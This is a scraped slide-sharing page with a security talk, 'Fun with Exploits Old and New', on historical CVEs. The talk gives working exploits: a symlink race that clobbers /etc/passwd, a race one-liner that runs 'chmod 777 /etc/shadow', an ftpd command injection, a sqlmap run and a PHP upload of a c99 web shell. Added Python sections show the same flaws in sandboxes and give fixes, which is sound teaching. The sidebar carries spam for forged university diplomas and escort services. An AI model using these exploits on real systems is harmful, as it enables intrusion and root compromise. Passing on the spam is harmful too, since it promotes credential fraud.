Semelhante a Fun with Exploits Old and New: Software Behavior and Exploitation (20)

24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs24HOP Introduction to Linux for SQL Server DBAs
24HOP Introduction to Linux for SQL Server DBAs
 
PHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vulnPHP Backdoor: The rise of the vuln
PHP Backdoor: The rise of the vuln
 
#WeSpeakLinux Session
#WeSpeakLinux Session#WeSpeakLinux Session
#WeSpeakLinux Session
 
PowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue KidPowerShell - Be A Cool Blue Kid
PowerShell - Be A Cool Blue Kid
 
Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境Mac OS X Lion で作る WordPress local 環境
Mac OS X Lion で作る WordPress local 環境
 
IT Automation with Ansible
IT Automation with AnsibleIT Automation with Ansible
IT Automation with Ansible
 
Lateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your NetworkLateral Movement: How attackers quietly traverse your Network
Lateral Movement: How attackers quietly traverse your Network
 
Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016Lateral Movement - Hacker Halted 2016
Lateral Movement - Hacker Halted 2016
 
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line KeystrokesEfficient DBA: Gain Time by Reducing Command-Line Keystrokes
Efficient DBA: Gain Time by Reducing Command-Line Keystrokes
 
InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018InSpec Workshop at Velocity London 2018
InSpec Workshop at Velocity London 2018
 
Linux Hardening - nullhyd
Linux Hardening - nullhydLinux Hardening - nullhyd
Linux Hardening - nullhyd
 
DevOpsDays InSpec Workshop
DevOpsDays InSpec WorkshopDevOpsDays InSpec Workshop
DevOpsDays InSpec Workshop
 
Introduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release updateIntroduction to InSpec and 1.0 release update
Introduction to InSpec and 1.0 release update
 
Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4Why and How Powershell will rule the Command Line - Barcamp LA 4
Why and How Powershell will rule the Command Line - Barcamp LA 4
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
 
Virtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + PuppetVirtualization and automation of library software/machines + Puppet
Virtualization and automation of library software/machines + Puppet
 
1000 to 0
1000 to 01000 to 0
1000 to 0
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, Powershell
 
20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag20090514 Introducing Puppet To Sasag
20090514 Introducing Puppet To Sasag
 
From P0W3R to SH3LL
From P0W3R to SH3LLFrom P0W3R to SH3LL
From P0W3R to SH3LL
 

Último

英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作qr0udbr0
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Angel Borroy López
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfFerryKemperman
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfStefano Stabellini
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtimeandrehoraa
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Andreas Granig
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaHanief Utama
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....kzayra69
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Natan Silnitsky
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityNeo4j
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样umasea
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureDinusha Kumarasiri
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Mater
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Velvetech LLC
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmSujith Sukumaran
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based projectAnoyGreter
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024StefanoLambiase
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...OnePlan Solutions
 

Último (20)

英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作英国UN学位证,北安普顿大学毕业证书1:1制作
英国UN学位证,北安普顿大学毕业证书1:1制作
 
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
Alfresco TTL#157 - Troubleshooting Made Easy: Deciphering Alfresco mTLS Confi...
 
Introduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdfIntroduction Computer Science - Software Design.pdf
Introduction Computer Science - Software Design.pdf
 
Xen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdfXen Safety Embedded OSS Summit April 2024 v4.pdf
Xen Safety Embedded OSS Summit April 2024 v4.pdf
 
SpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at RuntimeSpotFlow: Tracking Method Calls and States at Runtime
SpotFlow: Tracking Method Calls and States at Runtime
 
Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024Automate your Kamailio Test Calls - Kamailio World 2024
Automate your Kamailio Test Calls - Kamailio World 2024
 
React Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief UtamaReact Server Component in Next.js by Hanief Utama
React Server Component in Next.js by Hanief Utama
 
What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....What are the key points to focus on before starting to learn ETL Development....
What are the key points to focus on before starting to learn ETL Development....
 
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
Taming Distributed Systems: Key Insights from Wix's Large-Scale Experience - ...
 
EY_Graph Database Powered Sustainability
EY_Graph Database Powered SustainabilityEY_Graph Database Powered Sustainability
EY_Graph Database Powered Sustainability
 
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
办理学位证(UQ文凭证书)昆士兰大学毕业证成绩单原版一模一样
 
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort ServiceHot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
Hot Sexy call girls in Patel Nagar🔝 9953056974 🔝 escort Service
 
Implementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with AzureImplementing Zero Trust strategy with Azure
Implementing Zero Trust strategy with Azure
 
Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)Ahmed Motair CV April 2024 (Senior SW Developer)
Ahmed Motair CV April 2024 (Senior SW Developer)
 
Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...Software Project Health Check: Best Practices and Techniques for Your Product...
Software Project Health Check: Best Practices and Techniques for Your Product...
 
Advantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your BusinessAdvantages of Odoo ERP 17 for Your Business
Advantages of Odoo ERP 17 for Your Business
 
Intelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalmIntelligent Home Wi-Fi Solutions | ThinkPalm
Intelligent Home Wi-Fi Solutions | ThinkPalm
 
MYjobs Presentation Django-based project
MYjobs Presentation Django-based projectMYjobs Presentation Django-based project
MYjobs Presentation Django-based project
 
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
Dealing with Cultural Dispersion — Stefano Lambiase — ICSE-SEIS 2024
 
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
Maximizing Efficiency and Profitability with OnePlan’s Professional Service A...
 

Fun with Exploits Old and New: Software Behavior and Exploitation

1. Fun with Exploits Old and New
How software is expected to behave, how it really behaves and how we can exploit it
Larry W. Cashdollar
11/13/2015
V1.9

2. Who Am I
• 15 years at Akamai Technologies
• Hobbyist Vulnerability Researcher
• 100+ Vulnerabilities discovered
• Formerly Unix Systems Administrator 17 years
• Penetration Tester Back in Late 90s
• Enjoy Writing and Breaking Code
• This is my second time speaking in public

3. Terminology
• CVE – Common Vulnerabilities and Exposures
• Root shell – gaining access to the administrative (root) user on a Unix system
• Web shell – a web-based shell used to access the system via HTTP
• Vulnerability – a flaw in a piece of software
• PoC – Proof of Concept

4. What is this all about?
• Concepts
• Methodologies
• Mind set
• How can I break this?
• Think like a hacker

5. Why bother hacking stuff?
• Improves software security
• Improves stability
• It's like solving a puzzle
• Can be a lot of fun
• Improves your skills
• And……..

6. Exploiting a vulnerability you found feels like

7. Some common Vulnerabilities
• LFI (Local File Inclusion)
• RFI (Remote File Inclusion)
• RCE (Remote Command Execution)
• Race Condition
• SQL Injection
• XSS (Cross Site Scripting)
• Command Injection

8. Concepts
• Unchecked User Input
• User Input is expected to behave
• Abuse Program Flow
• Unintended functionality
• Abuse software privilege
10. IRIX Midikeys: CVE-1999-0765

11. CVE-1999-0765 setuid root binary abuse
• Binary executes with root privileges
• Allows modification of sensitive system files

12. Exploit CVE-1999-0765
• Open /etc/passwd as a .wav file
• Or export WINEDITOR=/usr/X11/bin/xterm and let the setuid binary launch the "editor" as a root xterm
13. Sawmill LFI & weak encryption CVE-2000-0589 & CVE-2000-0588
• Log analysis server listens on port 8987
• LFI can read the first line of any world-readable file
• Admin password stored in a local file
• Admin password encrypted with a custom algorithm

14. Exploiting CVE-2000-0589 & CVE-2000-0588
• $ curl http://192.168.1.65:8987/sawmill?rfcf+%22/etc/sawmill/adminpwd.db%22+spbn+1,1,21,1,1,1,1,1,1,1,1,1+3
• Returns encrypted password Am@duZw
• Simple substitution cypher
• Wrote code to decrypt… for my palm pilot IIIxe
16. PoC for CVE-2000-0589 & CVE-2000-0588

    #include <stdio.h>
    #include <string.h>

    /* plaintext alphabet and the ciphertext alphabet it maps to, position for position */
    char *alpha  = "abcdefghijklmnopqrstuvwxyz0123456789!@$%^&()_+~<>?:\"{}|";
    char *encode = "=GeKMNQS~TfUVWXY[abcygimrs\"$&-]FLq4.@wICH2!oEn}Z%(Ovt{z";

    int
    main (int argc, char **argv)
    {
      int x, y;
      char cypher[128];

      if (argc < 2) {
        fprintf (stderr, "usage: %s <encrypted password>\n", argv[0]);
        return 1;
      }

      strncpy (cypher, argv[1], sizeof (cypher) - 1);
      cypher[sizeof (cypher) - 1] = '\0';

      /* for each ciphertext character, print the plaintext character at the same position */
      for (x = 0; x < strlen (cypher); x++) {
        for (y = 0; y < strlen (encode); y++)
          if (cypher[x] == encode[y]) {
            printf ("%c", alpha[y]);
            break;
          }
      }

      printf ("\n\"+\" could also be a space [ ]\n");
      return 0;
    }

• Decrypted password was 'wookie'
• Access to modify administrative control panel
• Developer gave me a free license
17. Solaris catman file clobbering vulnerability CVE-2000-0095
• Creates files in /tmp insecurely
• Uses guessable filenames
• Doesn't check to see if the file already exists
• Creates files in /tmp as /tmp/sman_PID
• We can guess the next filename and symlink it to /etc/passwd
18. PoC

    #!/usr/local/bin/perl -w
    # http://vapid.dhs.org
    $clobber = "/etc/passwd";
    # file to clobber
    $X = getpgrp();
    $Xc = $X;
    # Constant
    $Y = $X + 1000;
    # Constant
    # Pre-create a symlink for each of the next 1000 PIDs, so whichever PID
    # catman gets, /tmp/sman_PID already points at the file to clobber.
    while ($X < $Y) {
        print "Linking /tmp/sman_$X to $clobber :";
        # Change $clobber to what you want to clobber.
        if (symlink ($clobber, "/tmp/sman_$X")) {
            print "Success\n";
        } else {
            print "failed, Busy system?\n";
        }
        $X = $X + 1;
    }
    # Watch /tmp and see if catman is executed in time.
    while (1) {
        $list = "/usr/bin/ls -l /tmp | grep sman | grep root |";
        open (list, $list) or die "can't open ls...\n";
        while (<list>) {
            @args = split "_", $_;
            chop ($args[1]);
            if ($args[1] >= $Xc && $args[1] <= $Y) {
                print "Looks like pid $args[1] is the winner\n cleaning....\n";
                `/usr/bin/rm -f /tmp/sman*`;
                exit(1);
            }
        }
    }
19. Exploit Results
• /etc/passwd overwritten with the contents of sman_pid
• System hosed
21. Centrify CVE-2012-6348 /tmp race condition local root
• Administrative control daemon for system management
• Creates a file in /tmp as centrify.cmd.0
• Executes that file as a shell script!
• Executes as root!
22. CVE-2012-6348 PoC
Wins the race condition 50% of the time:

    $ while (true) ; do echo "chmod 777 /etc/shadow" >> /tmp/centrify.cmd.0; done

After the system is refreshed via an administrative control job:

    $ ls -l /etc/shadow
    -rwxrwxrwx 1 root shadow 1010 Dec 7 21:57 /etc/shadow
23. CVE-2012-6348 Better PoC
• Wins the race condition 100% of the time
• Written in C
• Uses inotify to detect the file being created and modified, instead of appending blindly in a loop
• Too long to display here
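The catman (CVE-2000-0095) and Centrify (CVE-2012-6348) bugs are the same defect: a privileged program uses a name in a world-writable directory that an attacker can predict and pre-create. The following Python is an added example, not code from the deck, that stages the race in a private directory standing in for /tmp: the attacker links the guessable name to a victim file, plain open() clobbers the victim through the link, while O_CREAT|O_EXCL|O_NOFOLLOW refuses to touch a pre-existing object and mkstemp() removes the predictability altogether. The file names, the victim contents and the data written are constructed for the example.

```python
import os
import tempfile
from pathlib import Path

# Constructed stand-in for the first line of /etc/passwd.
VICTIM_CONTENT = "root:x:0:0:root:/root:/bin/sh\n"
# Constructed stand-in for what catman writes into its scratch file.
SCRATCH_DATA = "preformatted man page data\n"


def insecure_create(path: str, data: str) -> None:
    """The catman/Centrify pattern: open a predictable name in a shared
    directory with plain open().  open() follows a symlink sitting at that
    name and truncates whatever it points to, so the attacker's link target
    is overwritten with our data."""
    with open(path, "w") as fh:
        fh.write(data)


def secure_create(path: str, data: str) -> None:
    """Only proceed if *we* created the file: O_EXCL makes the open fail if
    any object (file, symlink, anything) already exists at the path,
    O_NOFOLLOW refuses to traverse a symlink in the last component, and
    mode 0600 keeps other users out of the new file."""
    flags = os.O_WRONLY | os.O_CREAT | os.O_EXCL | os.O_NOFOLLOW
    fd = os.open(path, flags, 0o600)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)


def unpredictable_create(directory: str, data: str) -> str:
    """mkstemp() opens with O_EXCL under a random name, so there is no
    'next filename' for an attacker to guess and pre-link."""
    fd, path = tempfile.mkstemp(prefix="sman_", dir=directory)
    with os.fdopen(fd, "w") as fh:
        fh.write(data)
    return path


def demo() -> dict:
    """Stage the race: the attacker has already linked sman_<pid> (the
    guessable name the privileged program will use next) to the victim."""
    root = tempfile.mkdtemp()
    victim = os.path.join(root, "passwd")        # stands in for /etc/passwd
    Path(victim).write_text(VICTIM_CONTENT)

    guessable = os.path.join(root, "sman_1234")  # 1234: the PID the attacker guessed
    os.symlink(victim, guessable)                # attacker's pre-placed link

    # Vulnerable program runs: the victim is clobbered through the link.
    insecure_create(guessable, SCRATCH_DATA)
    victim_after = Path(victim).read_text()

    # Hardened program runs against the same pre-placed link: refused.
    refused = False
    try:
        secure_create(guessable, SCRATCH_DATA)
    except FileExistsError:
        refused = True

    # Hardened program with an unpredictable name: nothing to pre-link.
    safe_path = unpredictable_create(root, SCRATCH_DATA)

    return {
        "victim_clobbered": victim_after == SCRATCH_DATA,
        "secure_refused": refused,
        "safe_name_is_random": os.path.basename(safe_path) != "sman_1234",
    }


if __name__ == "__main__":
    print(demo())
```

O_EXCL is what defeats the Centrify variant too: if the attacker's centrify.cmd.0 is already sitting in /tmp, a privileged create with O_EXCL fails instead of silently reusing (and then executing) the attacker's file. Executing anything out of a world-writable directory remains a bad idea even with the safe open.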
24. Ftpd ruby gem command injection CVE-2013-2512
• FTP server developed in ruby
• Code examination reveals remote command injection (the ls method, lines 208-220):

    def ls(ftp_path, option)
      path = expand_ftp_path(ftp_path)
      dirname = File.dirname(path)
      filename = File.basename(path)
      command = [
        'ls',
        option,
        filename,                # <-- unsanitized user controlled input
        '2>&1',
      ].compact.join(' ')
      if File.exists?(dirname)   # <-- the directory has to exist for the ls command to run
        list = Dir.chdir(dirname) do
          `#{command}`           # <-- the joined string is passed to the shell here
25. CVE-2013-2512 PoC

    $ ftp localhost
    Connected to localhost.
    220 ftpd
    Name (localhost:root): anonymous
    331 Password required
    Password:
    230 Logged in
    Remote system type is UNIX.
    Using binary mode to transfer files.
    * I already created the filename foobar by uploading a file
    ftp> ls foobar;id
    200 PORT command successful
    150 Opening ASCII mode data connection
    -rw-r--r-- 1 root root 0 Mar 2 05:52 adfasdf
    uid=0(root) gid=0(root) groups=0(root)
    226 Transfer complete
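What makes the ls method exploitable is not ls itself but the shell that interprets the joined string. The following Python is an added example, not the gem's code or the deck's: ls_vulnerable() mirrors the gem's join-and-backtick pattern, ls_fixed() passes argv as a list so no shell ever sees the file name, whitelists the option and rejects names that leave the directory. The payload uses echo instead of the deck's id so the injected command leaves a marker that does not depend on id(1); the directory and file are constructed for the example.

```python
import re
import subprocess
import tempfile
from pathlib import Path

# Constructed payload: the deck used "foobar;id"; echo leaves a marker line
# that proves the part after ';' ran as its own command.
INJECTED_NAME = "foobar;echo INJECTED_MARKER"
MARKER = "INJECTED_MARKER"


def ls_vulnerable(dirname: str, option: str, filename: str) -> str:
    """Python rendering of the gem's ls(): option and filename are joined
    into one string that is handed to /bin/sh, so ';', '|', '$(..)' and
    friends inside the file name become shell syntax."""
    command = " ".join(p for p in ("ls", option, filename, "2>&1") if p)
    proc = subprocess.run(command, shell=True, cwd=dirname,
                          capture_output=True, text=True)
    return proc.stdout


def ls_fixed(dirname: str, option: str, filename: str) -> str:
    """No shell at all: argv goes to exec as a list, so the file name is one
    argument whatever it contains.  The option is checked against a small
    whitelist, the name is kept inside the current directory, and '--'
    stops ls from reading a name that starts with '-' as an option."""
    if option and not re.fullmatch(r"-[alR]{1,3}", option):
        raise ValueError("unsupported ls option: %r" % option)
    if "/" in filename or filename in ("", ".", ".."):
        raise ValueError("bad file name: %r" % filename)
    argv = ["ls"] + ([option] if option else []) + ["--", filename]
    proc = subprocess.run(argv, cwd=dirname, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def demo() -> dict:
    """Recreate the deck's session: 'upload' foobar, then LIST a name that
    carries a trailing command, against both implementations."""
    root = tempfile.mkdtemp()
    Path(root, "foobar").write_text("")          # the file created via upload

    vuln_out = ls_vulnerable(root, "-l", INJECTED_NAME)
    fixed_out = ls_fixed(root, "-l", INJECTED_NAME)
    real_out = ls_fixed(root, "-l", "foobar")

    try:
        ls_fixed(root, "-l;id", "foobar")        # injection via the option slot
        option_rejected = False
    except ValueError:
        option_rejected = True

    return {
        # a line that is exactly the marker means the injected command ran
        "vulnerable_ran_injected": MARKER in vuln_out.splitlines(),
        "fixed_ran_injected": MARKER in fixed_out.splitlines(),
        # the hardened version still lists a genuine file
        "fixed_lists_real_file": "foobar" in real_out,
        "option_rejected": option_rejected,
    }


if __name__ == "__main__":
    print(demo())
```

With the argv form, ls simply reports that the file "foobar;echo INJECTED_MARKER" does not exist; the same applies to the Ruby original if `#{command}` is replaced by `IO.popen(['ls', option, filename])`, which bypasses the shell in the same way.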
26. wp-powerplaygallery vulnerable SQL injection code CVE-2015-5599
Lines 131 and 133 of upload.php build the INSERT by string concatenation; albumid is taken straight from the request and placed in the query unquoted, and name lands between quotes without any escaping:

    $query = "INSERT INTO ".$wpdb->prefix."pp_images (`category_id`, `title`, `description`, `price`, `thumb`, `image`, `status`, `order`, `creation_date` ) VALUES (".$_REQUEST['albumid'].",'".$imgname[0]."','".$imgname[0]."','','".$resize."','".$_REQUEST['name']."',1,'','NULL')";
    $wpdb->query($query);
27. Blind SQLi Exploit
• Sqlmap

    $ sqlmap -u http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php --data "albumid=1" --dbms mysql --level 5 --risk 3
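To see why the unquoted albumid is injectable, the following Python is an added example, not the plugin's code or the deck's: it transliterates the line-131 INSERT onto an in-memory SQLite database with a constructed stand-in for the pp_images and users tables (and a fake admin hash), then sends a subquery as albumid. The vulnerable builder evaluates the subquery and stores its result in category_id; a boolean probe of the kind sqlmap sends is stored as 1 or 0. The hardened form requires an integer album id and binds every value as a parameter. In the real plugin the attacker never reads category_id back and sqlmap infers the content from the response one condition at a time; the example only shows that the value is executed as SQL.

```python
import sqlite3

# Constructed stand-in for the two tables involved; the admin hash is fake.
SCHEMA = """
CREATE TABLE wp_pp_images (
    id INTEGER PRIMARY KEY,
    category_id INTEGER, title TEXT, description TEXT, price TEXT,
    thumb TEXT, image TEXT, status INTEGER, "order" TEXT, creation_date TEXT
);
CREATE TABLE wp_users (ID INTEGER PRIMARY KEY, user_login TEXT, user_pass TEXT);
INSERT INTO wp_users VALUES (1, 'admin', '$P$Bconstructedhash0000000000000');
"""

FAKE_HASH = "$P$Bconstructedhash0000000000000"


def open_db() -> sqlite3.Connection:
    db = sqlite3.connect(":memory:")
    db.executescript(SCHEMA)
    return db


def insert_vulnerable(db, albumid: str, imgname: str, resize: str, name: str) -> None:
    """Line 131 of upload.php, transliterated: albumid is concatenated into
    the statement unquoted, so whatever the request carries is parsed as SQL."""
    query = ("INSERT INTO wp_pp_images (category_id, title, description, price, "
             "thumb, image, status, \"order\", creation_date) VALUES ("
             + albumid + ",'" + imgname + "','" + imgname + "','','" + resize
             + "','" + name + "',1,'','NULL')")
    db.execute(query)
    db.commit()


def insert_fixed(db, albumid: str, imgname: str, resize: str, name: str) -> None:
    """Hardened form: the album id must parse as an integer, and every value
    travels as a bound parameter, never as query text."""
    category_id = int(albumid)  # ValueError on anything that is not a number
    db.execute(
        "INSERT INTO wp_pp_images (category_id, title, description, price, "
        "thumb, image, status, \"order\", creation_date) "
        "VALUES (?, ?, ?, '', ?, ?, 1, '', 'NULL')",
        (category_id, imgname, imgname, resize, name),
    )
    db.commit()


def demo() -> dict:
    # albumid that is a subquery instead of a number: the vulnerable INSERT
    # evaluates it and stores the admin hash in category_id.
    exfil = "(SELECT user_pass FROM wp_users WHERE ID=1)"
    # A boolean probe of the kind a blind attack uses: stores 1 if true, 0 if not.
    probe = ("(SELECT CASE WHEN substr(user_pass,1,3)='$P$' THEN 1 ELSE 0 END "
             "FROM wp_users WHERE ID=1)")

    db = open_db()
    insert_vulnerable(db, exfil, "pic.jpg", "pic_thumb.jpg", "pic.jpg")
    insert_vulnerable(db, probe, "pic.jpg", "pic_thumb.jpg", "pic.jpg")
    leaked = db.execute("SELECT category_id FROM wp_pp_images WHERE id=1").fetchone()[0]
    truth = db.execute("SELECT category_id FROM wp_pp_images WHERE id=2").fetchone()[0]

    db2 = open_db()
    try:
        insert_fixed(db2, exfil, "pic.jpg", "pic_thumb.jpg", "pic.jpg")
        rejected = False
    except ValueError:
        rejected = True
    insert_fixed(db2, "4", "pic.jpg", "pic_thumb.jpg", "pic.jpg")
    stored = db2.execute("SELECT category_id FROM wp_pp_images").fetchone()[0]

    return {
        "leaked_category_id": leaked,
        "blind_probe_true": truth == 1,
        "fixed_rejected": rejected,
        "fixed_stored": stored,
    }


if __name__ == "__main__":
    print(demo())
```

The WordPress equivalent of insert_fixed is `$wpdb->prepare()` with `%d` for the album id and `%s` for the strings; the int() cast in the example stands in for the `%d` placeholder.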
28. wp-powerplaygallery vulnerable RFI Code CVE-2015-5681
Lines 50-56 and 148-160 of upload.php (the lines in between are elided):

    $targetDir = $upload_dir['basedir'] . '/power_play/'.$_REQUEST['albumid'].'_uploadfolder';
    $cleanupTargetDir = true; // Remove old files
    $maxFileAge = 5 * 3600; // Temp file age in seconds

    // Create target dir
    if (!file_exists($targetDir)) {
        @mkdir($targetDir);
    }
    ...
    // Read binary input stream and append it to temp file
    if (!$in = @fopen($_FILES["file"]["tmp_name"], "rb")) {
        die('{"jsonrpc" : "2.0", "error" : {"code": 101, "message": "Failed to open input stream."}, "id" : "id"}');
    }
    ...
    while ($buff = fread($in, 4096)) {
        fwrite($out, $buff);
    }
29. RFI Exploit Requirements
• POST request
• Variable albumid must point at an existing album in the database
• File to upload must exist locally
• Use c99 shell as our payload
• file variable contains the payload with its local full path
• name variable contains our filename
30. PoC Exploit

    <?php
    $target_url = 'http://www.vapidlabs.com/wp-content/plugins/wp-powerplaygallery/upload.php';
    $file_name_with_full_path = '/var/www/shell.php';
    echo "POST to $target_url $file_name_with_full_path";
    // PHP 5.5+ ships CURLFile for uploads; the '@/path' form is the pre-5.5 syntax,
    // disabled by default (CURLOPT_SAFE_UPLOAD) from 5.6 and gone in 7.0
    $upload = class_exists('CURLFile')
        ? new CURLFile($file_name_with_full_path)
        : '@'.$file_name_with_full_path;
    $post = array('albumid' => '4', 'name' => 'shell.php', 'file' => $upload);
    $ch = curl_init();
    curl_setopt($ch, CURLOPT_URL, $target_url);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $result = curl_exec($ch);
    curl_close($ch);
    echo "<hr>";
    echo $result;
    echo "<hr>";
    ?>